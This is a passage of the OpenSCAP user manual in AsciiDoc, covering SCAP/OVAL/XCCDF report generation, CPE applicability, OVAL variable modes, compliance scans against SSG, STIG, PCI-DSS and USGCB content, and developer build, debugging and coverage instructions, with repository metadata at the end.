report-xccdf.html\n-------------------------------------------------------------------\n\n* Generating the OVAL scan report (see an\nhttp:\/\/mpreisle.fedorapeople.org\/openscap\/report-oval.html[example]):\n----------------------------------------------------------------\n$ oscap oval generate report oval-results.xml > report-oval.html\n----------------------------------------------------------------\n\n* Generating the XCCDF report with additional information from failed\nOVAL tests (see an\nhttp:\/\/mpreisle.fedorapeople.org\/openscap\/report-xccdf-oval.html[example]):\n----\n$ oscap xccdf generate report --oval-template oval-results.xml xccdf-results.xml > report-xccdf-oval.html\n----\n\n\n=== CPE applicability\nXCCDF rules in the content may target only specific platforms and hold\nno meaning on other platforms. Such an XCCDF rule contains an\n*<xccdf:platform>* element in its body. This element references a CPE\nname or CPE2 platform (defined using **cpe2:platform-specification**)\nthat could be defined in a CPE dictionary file or a CPE language file\nor it can also be embedded directly in the XCCDF document.\n\nAn XCCDF rule can contain multiple *<xccdf:platform>* elements. It is\ndeemed applicable if at least one of the listed platforms is applicable.\nIf an XCCDF rule contains no *<xccdf:platform>* elements it is considered\nalways applicable.\n\nIf the CPE name or CPE2 platform is defined in an external file, use the\n ```--cpe``` option and ```oscap``` auto-detects format of the file. 
The following\ncommand is an example of the XCCDF content evaluation using CPE name\nfrom an external file:\n\n-----------------------------------------------------------------------------------------\n$ oscap xccdf eval --results xccdf-results.xml --cpe external-cpe-file.xml xccdf-file.xml\n-----------------------------------------------------------------------------------------\n\nWhere *xccdf-file.xml* is the XCCDF document, *xccdf-results.xml* is a file\ncontaining the scan results, and *external-cpe-file.xml* is the CPE\ndictionary or a language file.\n\nIf you are evaluating a source data stream, ```oscap``` automatically\nregisters all CPEs contained within the data stream. No extra steps have\nto be taken. You can also register an additional external CPE file, as\nshown by the command below:\n\n----\n$ oscap xccdf eval --datastream-id ds.xml --xccdf-id xccdf.xml --results xccdf-results.xml --cpe additional-external-cpe.xml scap-ds.xml\n----\n\nWhere *scap-ds.xml* is a file representing the SCAP data stream\ncollection, *ds.xml* is the particular data stream, *xccdf.xml* is the\nXCCDF document, *xccdf-results.xml* is a file containing the scan\nresults, and *additional-external-cpe.xml* is the additional CPE\ndictionary or language file.\n\nThe ```oscap``` tool will use an OVAL file attached to the CPE dictionary to\ndetermine applicability of any CPE name in the dictionary.\n\nApart from the instructions above, no extra steps have to be taken for\ncontent using *cpe:fact-ref* or **cpe2:fact-ref**. See the following\nsections for details on resolving.\n\n==== xccdf:platform applicability resolution\n\nWhen a CPE name or language model platform is referenced via\n*<xccdf:platform>* elements, resolution happens in the following order:\n\n . Look into embedded CPE2 language model if name is found and applicable deem\n it applicable\n . If not found or not applicable, look into external CPE2 language models\n (order of registration)\n . If not found or not applicable, look into embedded CPE dictionary\n . If not found or not applicable, look into external CPE dictionaries (order of\n registration)\n\nIf the CPE name is not found in any of the sources, it is deemed not\napplicable. If it is found in any of the sources but not applicable, we\nlook for it elsewhere.\n\n==== cpe:fact-ref and cpe2:fact-ref resolution\n\nCPE name referenced from within fact-ref is resolved in the following\norder:\n\n. Look into embedded CPE dictionary, if name is found and applicable\ndeem it applicable\n. If not found or not applicable, look into external CPE dictionaries\n(order of registration)\n\n==== Built-in CPE Naming Dictionary\n\nApart from the external CPE Dictionaries, ```oscap``` comes with an inbuilt\nCPE Dictionary. The built-in CPE Dictionary contains only a few products\n(sub-set of http:\/\/nvd.nist.gov\/cpe.cfm[Official CPE Dictionary]) and it\nis used as a fall-back option when there is no other CPE source found.\n\nThe list of inbuilt CPE names can be found in the output of\n\n-----------------\n$ oscap --version\n-----------------\n\nYou can file a request to include any additional product in the built-in\ndictionary via https:\/\/www.redhat.com\/mailman\/listinfo\/open-scap-list[open-scap\nmailing list] or\nhttps:\/\/bugzilla.redhat.com\/enter_bug.cgi?product=Fedora[bugzilla].\n\n\n=== Notes on the Concept of Multiple OVAL Values\nThis section describes advanced concepts of OVAL Variables and their\nimplementation in ```oscap```. 
The SCAP specification allows for an OVAL\nvariable to have multiple values during a single assessment run. There\nare two variable modes which can be combined:\n\n* Multival -- A variable is assigned with multiple values at the same\ntime. As an example, consider a variable which refers to preferred\npermission of a given file, that may take multiple values like: '600',\n'400'. The evaluation tries to match each (or all) and then outputs a\nsingle OVAL Definition result.\n* Multiset -- A variable is assigned with a different value (or\nmultival) for different evaluations. This is known as a\n*variable_instance*. As an example consider an OVAL definition which\nchecks that a package given by a variable is not installed. For the first\nevaluation of the definition, the variable can be assigned with\n'telnet-server' value, for second time the variable can be assigned with\n'tftp-server' value. Therefore both evaluations may output different\nresults. Thus, the OVAL Results file may contain multiple results for\nthe same definition, these are distinguished by *variable_instance*\nattribute.\n\nThese two concepts are a source of confusion for both the content\nauthors and the result consumers. On one hand, the first concept is well\nsupported by the standard and the OVAL Variable file format. It allows\nmultiple *<value>* elements for each *<variable>* element. On the other\nhand, the second concept is not supported by an OVAL Variable schema\nwhich prevents fully automated evaluation of the multisets (unless you\nuse XCCDF to bridge that gap).\n\nTIP: ```oscap``` supports both variable modes as described below.\n\n==== Sources of Variable Values\nFirst we need to understand how a single value can be bound to a\nvariable in the OVAL checking engine. There are three ways to do this:\n\n1) OVAL Variables File -- The values of external variables can be\ndefined in an external file. Such a file is called an OVAL Variable File\nand can be recognized by using the following command: `oscap info\nfile.xml`. The OVAL Variables file can be passed to the evaluation by\n ```--variables``` argument such as:\n----\n$ oscap oval eval --variables usgcb-rhel5desktop-oval.xml-0.variables-0.xml --results usgcb-results-oval.xml usgcb-rhel5desktop-oval.xml\n----\n\n2) XCCDF Bindings -- The values of external variables can be given from\nan XCCDF file. In the XCCDF file within each *<xccdf:check>* element,\nthere might be *<xccdf:check-export>* elements. These elements allow\ntransition of *<xccdf:value>* elements to *<oval:variables>* elements. The\nfollowing command allows users to export variable bindings from XCCDF to\nan OVAL Variables file:\n----\n$ oscap xccdf export-oval-variables --profile united_states_government_configuration_baseline usgcb-rhel5desktop-xccdf.xml\n----\n\n3) Values within an OVAL Definition File -- Variables' values defined\ndirectly in the OVAL definitions file *<constant_variable>* and\n*<local_variable>* elements.\n\n==== Evaluation of Multiple OVAL Values\nWith ```oscap```, there are two possible ways how two or more values can be\nspecified for a variable used by one OVAL definition. 
The approach you choose\ndepends on what mode you want to use, multival or multiset.\n\nThe ```oscap``` handles multiple OVAL values seemlessly; such that user doesn't\nneed to do anything differently than what she (or he) does for a normal scan.\nThe command below demonstrates evaluation of DataStream, which may include\nmultiset, multival, or both concepts combined, or none of them.\n----\n$ oscap xccdf eval --profile my_baseline --results-arf scap-arf.xml --cpe additional-external-cpe.xml scap-ds.xml\n----\n\n==== Multival\nMultival can pass multiple values to a single OVAL definition\nevaluation. This can be accomplished by all three ways as described in\nprevious section.\n\n1) OVAL Variables file -- This option is straight forward. The file\nformat (XSD schema) allows for multiple *<value>* elements within each\n*<variable>* element.\n\n--------------------------------------------------------------------------------\n <variable id=\"oval:com.example.www:var:1\" datatype=\"string\" comment=\"Unknown\">\n <value>600<\/value>\n <value>400<\/value>\n <\/variable>\n--------------------------------------------------------------------------------\n\n2) XCCDF Bindings -- Use multiple *<xccdf:check-export>* referring to the\nvery same OVAL variable binding with multiple different XCCDF values.\n-----------------------------------------------------------------------------------------------------\n <check system=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\">\n <check-export value-id=\"xccdf_com.example.www_value_1\" export-name=\"oval:com.example.www:var:1\"\/>\n <check-export value-id=\"xccdf_com.example.www_value_2\" export-name=\"oval:com.example.www:var:1\"\/>\n <check-content-ref href=\"my-test-oval.xml\" name=\"oval:com.example.www:def:1\"\/>\n <\/check>\n-----------------------------------------------------------------------------------------------------\n\n3) Values within OVAL Definitions file -- This is similar to using a\nVariables file, there are multiple *<value>* elements allowed within\n*<constant_variable>* or *<local_variable>* elements.\n\n==== Multiset\nMultiset allows for the very same OVAL definition to be evaluated\nmultiple times using different values assigned to the variables for each\nevaluation. In OpenSCAP, this is only possible by option (2) XCCDF\nBindings. The following XCCDF snippet evaluates twice the very same OVAL\nDefinition, each time it binds a different value to the OVAL variable.\n\n-------------------------------------------------------------------------------------------------------\n <Rule id=\"xccdf_moc.elpmaxe.www_rule_1\" selected=\"true\">\n <check system=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\">\n <check-export value-id=\"xccdf_moc.elpmaxe.www_value_1\" export-name=\"oval:com.example.www:var:1\"\/>\n <check-content-ref href=\"my-test-oval.xml\" name=\"oval:com.example.www:def:1\"\/>\n <\/check>\n <\/Rule>\n <Rule id=\"xccdf_moc.elpmaxe.www_rule_2\" selected=\"true\">\n <check system=\"http:\/\/oval.mitre.org\/XMLSchema\/oval-definitions-5\">\n <check-export value-id=\"xccdf_moc.elpmaxe.www_value_2\" export-name=\"oval:com.example.www:var:1\"\/>\n <check-content-ref href=\"my-test-oval.xml\" name=\"oval:com.example.www:def:1\"\/>\n <\/check>\n <\/Rule>\n-------------------------------------------------------------------------------------------------------\n\nAfter the evaluation, the OVAL results file will contain multiple\nresult-definitions and multiple result-tests and multiple\ncollected-objects. 
The elements of the same id will be differentiated by\nthe value of the *variable_instance* attribute. Each of the\ndefinitions\/tests\/object might have a different result of evaluation.\nThe following snippet of OVAL results file illustrates output of a\nmultiset evaluation.\n\n----\n <tests>\n <test test_id=\"oval:com.example.www:tst:1\" version=\"1\" check=\"at least one\" result=\"true\" variable_instance=\"1\">\n <tested_item item_id=\"1117551\" result=\"true\"\/>\n <tested_variable variable_id=\"oval:com.example.www:var:1\">600<\/tested_variable>\n <\/test>\n <test test_id=\"oval:com.example.www:tst:1\" version=\"1\" check=\"at least one\" result=\"false\" variable_instance=\"2\">\n <tested_item item_id=\"1117551\" result=\"false\"\/>\n <tested_variable variable_id=\"oval:com.example.www:var:1\">400<\/tested_variable>\n <\/test>\n <\/tests>\n----\n\n\n\n\n== Practical Examples\nThis section demonstrates practical usage of certain security content provided\nfor Red Hat products.\n\nThese practical examples show usage of industry standard checklists that\nwere validated by NIST.\n\n=== Auditing System Settings with SCAP Security Guide\nThe SSG project contains guidance for settings of Red Hat Enterprise Linux 7.\n\n1) Install the SSG\n\n $ sudo yum install -y scap-security-guide\n\n2) To inspect the security content use the ```oscap info``` module:\n\n $ oscap info \/usr\/share\/xml\/scap\/ssg\/rhel7\/ssg-rhel7-ds.xml\n\nThe output of this command contains available configuration profiles. To audit\nyour system settings choose the\n ```xccdf_org.ssgproject.content_profile_rht-ccp``` profile and run the\nevaluation command . For example, the The following command is used to assess\nthe given system against a draft SCAP profile for Red Hat Certified Cloud\nProviders:\n\n $ oscap xccdf eval --profile xccdf_org.ssgproject.content_profile_rht-ccp\n--results ssg-rhel7-xccdf-result.xml --report ssg-rhel7-report.html\n\/usr\/share\/xml\/scap\/ssg\/rhel7\/ssg-rhel7-ds.xml\n\n\n=== Auditing Security Vulnerabilities of Red Hat Products\nThe Red Hat Security Response Team provides OVAL definitions for all\nvulnerabilities (identified by CVE name) that affect Red Hat Enterprise\nLinux 3, 4, 5, 6 and 7. This enable users to perform a vulnerability scan\nand diagnose whether system is vulnerable or not.\n\n1) Download the content\n---------------------------------------------------------------------------------\n$ wget http:\/\/www.redhat.com\/security\/data\/metrics\/com.redhat.rhsa-all.xccdf.xml\n$ wget http:\/\/www.redhat.com\/security\/data\/oval\/com.redhat.rhsa-all.xml\n---------------------------------------------------------------------------------\n\n2) Run the scan\n--------------------------------------------------------------------------------------------\n$ oscap xccdf eval --results results.xml --report report.html com.redhat.rhsa-all.xccdf.xml\n--------------------------------------------------------------------------------------------\n\nThis is a sample output. 
It reports that Red Hat Security\nAdvisory (RHSA-2013:0911) was issues but update was not applied so a\nsystem is affected by multiple CVEs (CVE-2013-1935, CVE-2013-1943,\nCVE-2013-2017)\n\n------------------------------------------------------------------------------------\nTitle RHSA-2013:0911: kernel security, bug fix, and enhancement update (Important)\nRule oval-com.redhat.rhsa-def-20130911\nIdent CVE-2013-1935\nIdent CVE-2013-1943\nIdent CVE-2013-2017\nResult fail\n------------------------------------------------------------------------------------\n\nNOTE: Note that these OVAL definitions are designed to only cover software and\nupdates released by Red Hat. You need to provide additional definitions in order\nto detect the patch status of third-party software.\n\n\nHuman readable report *report.html* is generated by side with \"machine\"\nreadable report **results.xml**. Both files hold information about\nvulnerability status of scanned system. They map RHSA to CVEs and report\nwhat security advisories are not applied. CVE identifiers are linked\nwith National Vulnerability Databases where additional information like:\nCVE description, CVSS score, CVSS vector, etc. are stored.\n\nTo find out more information about this project, see\nhttp:\/\/www.redhat.com\/security\/data\/metrics\/.\n\n\n=== How to Evaluate PCI-DSS on RHEL7\nThis section describes how to evaluate the Payment Card Industry Data Security\nStandard (PCI-DSS) on Red Hat Enterprise Linux 7.\n\n1) Install SSG which provides the PCI-DSS SCAP content\n\n $ sudo yum install -y scap-security-guide\n\n2) Verify that the PCI-DSS profile is present\n\n $ oscap info \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n\n3) Evaluate the PCI-DSS content\n\n $ oscap xccdf eval --results results.xml --profile xccdf_org.ssgproject.content_profile_pci-dss \/usr\/share\/xml\/scap\/ssg\/content\/ssg-rhel7-ds.xml\n\n4) Generate report readable in a web browser.\n\n $ oscap xccdf generate report --output report.html results.xml\n\n=== How to Evaluate DISA STIG\nThis section describes how to evaluate the Defense Information Systems Agency\n(DISA) Security Technical Implementation Guide (STIG) on Red Hat Eneterprise\nLinux 6.\n\n1) Download the DISA STIG content.\n----\n$ wget http:\/\/iasecontent.disa.mil\/stigs\/zip\/July2015\/U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark.zip\n----\n\n2) Unpack the content.\n---------------------------------------------------\n$ unzip U_RedHat_6_V1R8_STIG.zip\n---------------------------------------------------\n\n3) Fix the content using a sed substitution.\n---------------------------------------------------------------------------------------------------\n$ sed -i 's\/<Group\\ \\(.*\\)\/<Group\\ selected=\"false\"\\ \\1\/g' U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml\n---------------------------------------------------------------------------------------------------\n\nNOTE: Why is the substitution needed? According to the {xccdf_1-2}[XCCDF\nspecification 1.2] the ```selected``` attribute for *Rule* or *Group* is *true* by default.\nIt means that if you create a new profile even with only one rule selected, all\nrules within the benchmark will be evaluated because they are set to true by default. 
The\nsubstitution will set all Groups as unselected by default which means all\ndescendants will also be unselected by default.\n\n4) Display a list of available profiles.\n\n $ oscap info U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml\n\n5) Evaluate your favorite profile, for example *MAC-1_Public*, and write\nXCCDF results into the results.xml file.\n----\n$ oscap xccdf eval --profile MAC-1_Public --results results.xml --cpe U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-cpe-dictionary.xml U_RedHat_6_V1R8_STIG_SCAP_1-1_Benchmark-xccdf.xml\n----\n\n6) Generate a scan report that is readable in a web browser.\n-----\n$ oscap xccdf generate report --output report.html results.xml\n-----\n\nIf you are interested in DISA STIG content for RHEL5 or RHEL7 please visit\n{nvd}[National Vulnerability Database] and look for *Red Hat Enterprise Linux 6*\nor *Red Hat Enterprise Linux 7* as a target product.\n\n=== How to Evaluate United States Government Configuration Baseline (USGCB)\nNOTE: NIST offers no official USGCB for RHEL6 as of September 2014 but you can\nacquire the content from the {ssg_git}[SSG] project.\n\nThe USGCB content for represents Tier IV Checklist for Red Hat\nEnterprise Linux 5 (as defined by NIST Special Publication 800-70).\n\nWARNING: Proper evaluation of the USGCB document requires OpenSCAP version 0.9.1\nor later.\n\nAfter ensuring that version of OpenSCAP on your system is\nsufficient, perform the following tasks:\n\n1) Download the USGCB content.\n------------------------------------------------------------------------------\n$ wget http:\/\/usgcb.nist.gov\/usgcb\/content\/scap\/USGCB-rhel5desktop-1.2.5.0.zip\n------------------------------------------------------------------------------\n\n2) Unpack the USGCB content.\n--------------------------------------\n$ unzip USGCB-rhel5desktop-1.2.5.0.zip\n--------------------------------------\n\n3) Run evaluation of the USGCB content.\n----\n$ oscap xccdf eval --profile united_states_government_configuration_baseline --cpe usgcb-rhel5desktop-cpe-dictionary.xml --oval-results --fetch-remote-resources --results results.xml usgcb-rhel5desktop-xccdf.xml\n----\n\n4) Generate a scan report that is readable in a web browser.\n-----\n$ oscap xccdf generate report --output report.html results.xml\n-----\n\nAdditional reports can be generated from detailed OVAL result files.\nScanner outputs OVAL results files in the current directory, for each\nOVAL file on input there is one output. In case of USGCB, there is\none OVAL file distributed along the XCCDF, another one which is\ndownloaded from Red Hat Repository. The latter contains CVE information\nfor each evaluated definition.\n\n----\n$ oscap oval generate report --output oval-report-1.html usgcb-rhel5desktop-oval.xml.result.xml\n$ oscap oval generate report --output oval-report-2.html http%3A%2F%2Fwww.redhat.com%2Fsecurity%2Fdata%2Foval%2Fcom.redhat.rhsa-all.xml.result.xml\n----\n\nIf you're interested in runing evaluation of the USGCB on a remote machine using\na GUI please see:\nhttps:\/\/open-scap.org\/resources\/documentation\/evaluate-remote-machine-for-usgcb-compliance-with-scap-workbench\/[Evaluate\nRemote Machine for USGCB Compliance with SCAP Workbench] tutorial.\n\n\n=== How to Evaluate Third-Party Guidances\nThe SCAP content repository hosted at {nvd}[National Vulnerability Database]\n(NVD) can be searched for publicly available guidances for a given\nproduct. 
For example, as per 2013\/05\/11 there are\nhttp:\/\/web.nvd.nist.gov\/view\/ncp\/repository?tier=3&product=Red+Hat+Enterprise+Linux+5[two]\nTier III checklists for Red Hat Enterprise Linux 5. Analogously, the\nMITRE Corp. hosts http:\/\/oval.mitre.org\/rep-data\/[repository] of OVAL\ncontent for various platforms, sorted by versions and classes.\n\nLikewise the USGCB, any downloaded guidance can be evaluated by\nOpenSCAP.\n\n* Examplary evaluation of DoD Consensus Security Configuration Checklist\nfor Red Hat Enterprise Linux 5 (2.0)\n----\n$ wget http:\/\/nvd.nist.gov\/ncp\/DoD-RHEL5-desktop.zip\n$ unzip DoD-RHEL5-desktop.zip\n$ oscap xccdf eval --profile DOD_baseline_1.0.0.1 --cpe dcb-rhel5_cpe-dictionary.xml --results result.xml --oval-results dcb-rhel5_xccdf.xml\n----\n\n* Examplary evaluation of Red Hat 5 STIG Benchmark (Version 1, Release 12)\n----\n$ wget http:\/\/iasecontent.disa.mil\/stigs\/zip\/July2015\/U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark.zip\n$ unzip U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark.zip\n$ oscap xccdf eval --profile MAC-2_Public --cpe\nU_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark-cpe-dictionary.xml --results result.xml\n--oval-results U_RedHat_5_V1R12_STIG_SCAP_1-1_Benchmark-xccdf.xml\n----\n\nFurthermore, any individual file from the archive can be inspected using\nthe `oscap info` command line option. The oscap program does not have\nthe concept of importing SCAP files, therefore it can process any SCAP\nfiles available on the filesystem. That is possible because the SCAP\nstandard files are native file formats of the OpenSCAP.\n\n\n\n=== How to evaluate guidances for Red Hat Enterprise Linux 6\nGuidances for Red Hat Enterprise Linux 6 can be acquired from\n{ssg_git}[SCAP Security Guide\nproject] (SSG). SSG holds currently the most evolved and elaborate SCAP\npolicy for Linux systems. The project provides practical security\nhardening advice for Red Hat products and also links it to compliance\nrequirements in order to ease deployment activities, such as\ncertification and accreditation.\n\nThe project started in 2011 as open collaboration of U.S. Government\nbodies to develop next generation of United States Government Baseline\n(USGCB) available for Red Hat Enterprise Linux 6. There are multiple\nparties contributing to the project from the public sector and private\nsector.\n\nThe SSG project contains baselines for both desktops and servers. See\nhttps:\/\/github.com\/OpenSCAP\/scap-security-guide\n\n\n\n[[devs]]\n== Developer's operations\nThis part of documentation is meant to serve mainly to developers who want to\ncontribute to the ```oscap```, help to fix bugs, or take an advantage of\nthe OpenSCAP library and create own projects on top of it.\n\n[[devs-compiling]]\n=== Compiling\nIf you want to build the ```libopenscap``` library and the ```oscap``` tool from\nthe {oscap_git}[source code] then follow these instructions:\n\n1) Get the lastest source code\n\n $ git clone https:\/\/github.com\/OpenSCAP\/openscap.git\n\n2) Run the follwoing script.\n\n $ .\/autogen.sh\n\nNOTE: The *autoconf*, *automake*, and *libtool* tools are required to be\ninstalled on your system. If you use a release taball, you can skip this step.\n\n3) Run the following commands to build the library.\n\n $ .\/configure\n $ make\n\nBuild dependencies may vary in dependency on enabled f element in its body. 
\nBuild dependencies may vary depending on the features enabled (by the configure\ncommand). By default, you need the following packages\ninstalled on your system:\n\n\n* swig\n* libxml2-devel\n* rpm-devel\n* libgcrypt-devel\n* pcre-devel\n* python-devel\n* perl-devel\n* libcurl-devel\n* libxslt-devel\n* libtool\n* perl-XML-XPath\n\n4) Run the library self-checks.\n\n # make check\n\n5) Run the installation procedure.\n\n # make install\n\nIf you want to create a package for the Fedora or Red Hat Enterprise Linux\ndistributions, you will need the respective spec files. These spec files are\navailable under the following directories:\n\n* dist\/fedora\n* dist\/rhel5\n* dist\/rhel6\n\n=== Debugging\nDevelopers and users who intend to help find and fix possible bugs in OpenSCAP\nshould follow these instructions to enable debugging in OpenSCAP:\n\n==== Debug mode\nThe first and obvious step is to re-compile the library so that debug mode is\nenabled.\n\n------------------------------------\n$ .\/configure --enable-debug && make\n------------------------------------\n\nDebug mode provides:\n\n* debug symbols on and optimization off - you can use ```gdb```,\n* logs - the ```oscap``` tool will generate *oscap_debug.log.\\\\{pid}* log files for\nevery process that was run,\n* http:\/\/www.gnu.org\/software\/gawk\/manual\/html_node\/Assert-Function.html[assertions]\nare evaluated.\n\n==== Testing library\nThe next important step is to preload ```libopenscap_testing.so``` before you run\nthe ```oscap``` tool. The testing library allows you to specify a custom path to\nthe probes via the *OVAL_PROBE_DIR* environment variable. The easiest way to\nachieve that, without needing to install libopenscap, is to use the shell\nscript called *run* in the OpenSCAP directory.\n\n-------------------------------------------------\n$ .\/run utils\/.libs\/oscap xccdf eval ... whatever\n-------------------------------------------------\n\nThe *run* script is generated at configure time and it sets:\n\n* *LD_PRELOAD* and *LD_LIBRARY_PATH* - preload ```libopenscap_testing.so```\n* *OVAL_PROBE_DIR* - path to probes\n* *OSCAP_SCHEMA_PATH* - path to XCCDF, OVAL, CPE, ... schemas (required\nfor validation)\n* *OSCAP_XSLT_PATH* - path to XSLT transformations (required if you want\nto generate HTML documents from XML)\n\n==== Example\n\n $ .\/run gdb --args utils\/.libs\/oscap xccdf eval --profile hard --results xccdf-results.xml --oval-results my-favourite-xccdf-checklist.xml\n\n\nThe ```--oval-results``` option forces the ```oscap``` tool to generate an OVAL\nresult file for each OVAL session used for evaluation. It's also very useful for\ndebugging!\n
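\nTo double-check that the *run* wrapper really preloads the testing library, the dynamic linker's debug output can be used (a hedged aside; *LD_DEBUG* is a glibc feature and its output format may vary between versions):\n\n----\n$ LD_DEBUG=libs .\/run utils\/.libs\/oscap --version 2>&1 | grep testing\n----\n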
\n==== Debugging probes\nIt's also possible to debug a probe itself. You need to raise the timeout\nvalue for the thread join in ```src\/OVAL\/probes\/probe\/main.c:228``` and rebuild\nthe sources.\n\n----------------------------\n- j_tm.tv_sec += 3;\n+ j_tm.tv_sec += 3000;\n----------------------------\n\nThen you can run gdb with the probe binary:\n--------------------------------------------------------\n$ .\/run gdb src\/OVAL\/probes\/.libs\/probe_rpmverifypackage\n--------------------------------------------------------\n\nAn input for the probe can be found in the ```oscap_debug.log``` created by a\nprevious ```oscap``` tool run, e.g.:\n\n----\n (\"seap.msg\" \":id\" 0 ((\"rpmverifypackage_object\" \":id\" \"oval:org.mitre.oval.test:obj:1386\" \":oval_version\" 84541440 ) ((\"name\" \":operation\" 5 \":var_check\" 1 ) \"plymouth\" ) ((\"behaviors\" \":nodeps\" \"false\" \":nodigest\" \"false\" \":noscripts\" \"true\" \":nosignature\" \"false\" ) ) ) )\n----\n\n==== Environment variables\nThere are a few more environment variables that control the ```oscap``` tool's\nbehaviour.\n\n* *OSCAP_FULL_VALIDATION=1* - validate all exported documents (slower)\n* *SEXP_VALIDATE_DISABLE=1* - do not validate SEXP expressions (faster)\n* *OSCAP_DEBUG_FILE=\"foo\"* - name for debug files\n* *OSCAP_DEBUG_LEVEL=2* - set verbosity in debug logs\n** ```1``` for Errors\n** ```2``` for Errors & Warnings\n** ```3``` for Errors & Warnings & Info messages\n\n\n\n=== Scanning with Script Check Engine (SCE)\nThe Script Check Engine (SCE) is an alternative check engine for XCCDF checklist\nevaluation. SCE allows you to call shell scripts out of the XCCDF document.\nThis approach might be suitable for various use cases, mostly when OVAL checks\nare not required. More information about SCE usage is available on this page:\n{sce_web}[Using SCE].\n\nWARNING: SCE is not part of any SCAP specification.\n\n\n=== Building OpenSCAP on Windows\nThe OpenSCAP library is developed mainly on the Linux platform, but it can also\nbe built on Windows. Follow these instructions to build\nOpenSCAP on Windows using Cygwin:\n\n1. The easiest way to compile OpenSCAP on Windows is in\nhttp:\/\/www.cygwin.com\/[cygwin]. First install the basic set of packages from the\n*cygwin* distribution, plus:\n* *autoconf automake libtool make gcc*\n* *pcre-devel libxml2-devel libcurl-devel libgcrypt-devel*\n* *swig perl python*\n2. Checkout the portable branch of OpenSCAP:\n\n $ git clone -b portable git:\/\/git.fedorahosted.org\/git\/openscap.git\n\n3. Run the autotools machinery:\n\n $ .\/autogen.sh\n\n4. Unfortunately, probe support is platform dependent and the Windows code has\nnot been implemented yet, so it's necessary to disable compilation of the probes:\n\n $ .\/configure --disable-probes\n\n5. Build the library:\n\n $ make\n\n6. You might want to run the library self-check:\n\n $ make check\n\n7. Install the library:\n\n $ make install\n\n8. The final DLL is called ```cygopenscap-0.dll``` and you can link your app\nagainst it.\n\n----------------------------------------------------------------------------------\nExample: gcc myapp.c -I\/path\/to\/headers -L\/path\/to\/dynamic\/library -lcygopenscap-0\n----------------------------------------------------------------------------------\n\nIf you want to run your app, make sure ```cygopenscap-0.dll``` is either in the\nworking directory or in a directory listed in the PATH variable.\n
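\nTo verify that the resulting binary actually resolves the DLL at runtime, Cygwin's dependency checker can help (a hedged aside; the cygcheck utility ships with Cygwin):\n\n------------------------------------------\n$ cygcheck .\/myapp.exe | grep -i openscap\n------------------------------------------\n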
\n=== Generating code coverage\nCode coverage can be useful when writing tests or doing performance profiling.\nWe can separate the process into five phases.\n\n1) *Get dependencies*\n\n # dnf install lcov\n\n2) *Run configure & make*\n\nTo allow the code to generate statistics, we need to compile it with specific flags.\n\n $ .\/configure CFLAGS=\"--coverage\" LDFLAGS=-lgcov --enable-debug\n $ make\n\n3) *Run the code*\n\nIn this phase we run the code, either directly or via the test suite.\n\n $ .\/run .\/utils\/.libs\/oscap\n\n4) *Generate and browse results*\n\n $ lcov -t \"OpenSCAP coverage\" -o .\/coverage.info -c -d .\n $ genhtml -o .\/coverage .\/coverage.info\n $ xdg-open .\/coverage\/index.html # open results in browser\n\n5) *Clean stats*\n\nEvery run only adds to the current statistics rather than rewriting them\ncompletely. If we want to generate new statistics, we should remove the old\nones first.\n \n $ lcov --directory .\/ --zerocounters ; find .\/ -name \"*.gcno\" | xargs rm\n $ rm -rf .\/coverage\n
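\nIf you only need the overall numbers, lcov can also print a summary without the HTML step (a small hedged aside):\n\n----\n$ lcov --summary .\/coverage.info\n----\n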
\n=== Building OpenSCAP for Windows (cross-compilation)\nBuilding OpenSCAP for Windows without a POSIX emulation layer is currently not\npossible. However, we are close to a native port of OpenSCAP for Windows, and\nyou can help us solve the remaining problems. Instructions for cross-compiling\nOpenSCAP for Windows:\n\n1) Install the cross-compiler & dependencies\n\n-------------------------------------------------------------\n # yum install mingw32-gcc mingw32-binutils mingw32-libxml2 \\\n mingw32-libgcrypt mingw32-pthreads mingw32-libxslt \\\n mingw32-curl mingw32-pcre \\\n automake autoconf libtool\n-------------------------------------------------------------\n\n2) Checkout the portable branch of the OpenSCAP repository\n\n----------------------------------------------------------------------\n $ git clone -b portable git:\/\/git.fedorahosted.org\/git\/openscap.git \\\n openscap-portable.git\n $ cd openscap-portable.git\/\n----------------------------------------------------------------------\n\n3) Prepare the build\n\n------------------------------------------------------\n $ .\/autogen.sh\n $ mingw32-configure --disable-probes --disable-python\n------------------------------------------------------\n\n4) Build!\n\n------------------------------\n $ make -k 2> build-errors.log\n------------------------------\n\n5) Inspect build-errors.log for problems\n\n-----------------------------------------------\n $ grep -E '(error:|implicit)' build-errors.log\n-----------------------------------------------\n\n--------------------------------------------------------------------------\noscap_acquire.c:32:17: fatal error: ftw.h: No such file or directory\nrbt_i32.c:36:9: warning: implicit declaration of function 'posix_memalign'\nrbt_i64.c:35:9: warning: implicit declaration of function 'posix_memalign'\nrbt_str.c:39:9: warning: implicit declaration of function 'posix_memalign'\ntailoring.c:200:2: warning: implicit declaration of function 'strverscmp'\noscap-tool.c:37:17: fatal error: ftw.h: No such file or directory\noscap-oval.c:37:17: fatal error: ftw.h: No such file or directory\noscap-info.c:37:26: fatal error: linux\/limits.h: No such file or directory\n--------------------------------------------------------------------------\n\nWe need to solve the following problems:\n\n1. No implementation of ```strverscmp``` for Windows\n2. No implementation of the ftw API for Windows\n3. Replace posix_memalign with a Windows API equivalent\n4. Get rid of the ```linux\/limits.h``` dependency on Windows\n\nIf you would like to send us a patch solving one of these problems,\nplease consult the page about\nhttp:\/\/open-scap.org\/page\/Contribute[contributing to the OpenSCAP\nproject].\n\n\n=== OpenSCAP Reference Manual\nFor more information about the OpenSCAP library, you can refer to this online\nreference manual: http:\/\/static.open-scap.org\/openscap-1.2\/[OpenSCAP\nreference manual]. This manual is included in the release tarball and can be\nregenerated from the project sources by the Doxygen documentation system.\n\n","returncode":0,"stderr":"","license":"lgpl-2.1","lang":"AsciiDoc"} {"commit":"b6774667f17b69d9d3003cfe6467a71041487377","subject":"Update 2015-11-10-Visual-Question-Answering-2.adoc","message":"Update 